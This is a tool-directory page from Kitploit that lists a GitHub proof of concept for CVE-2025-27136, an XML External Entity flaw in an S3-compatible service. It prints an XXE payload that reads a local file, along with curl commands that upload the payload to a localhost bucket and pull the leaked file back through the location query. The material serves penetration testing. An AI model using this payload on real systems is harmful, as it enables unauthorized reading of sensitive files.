Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-27136 — XML External Entity PoC in an S3. | Kitploit
Tools/GitHubGitHub/issaboudin/cve-2025-27136
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingCloud Security
GitHubissaboudin/cve-2025-27136

CVE-2025-27136

XML External Entity PoC in an S3.

View Repository
136 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-27136

Exploiting an XML External Entity (XXE) Vulnerability.

Use XML Payload to Grab Sensitive Files (PoC)

test.xml

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///path/to/file">
]>
<CreateBucketConfiguration>
  <LocationConstraint>&xxe;</LocationConstraint>
</CreateBucketConfiguration>

Use curl to upload test.xml from our local machine to the bucket.

root@kitploit:~
curl -X PUT http://127.0.0.1:PORT/TB1 -H "Content-Type: application/xml" -d @test.xml

Trigger the Exploit & Grab the File

root@kitploit:~
curl http://127.0.0.1:PORT/TB1?location
Download Tool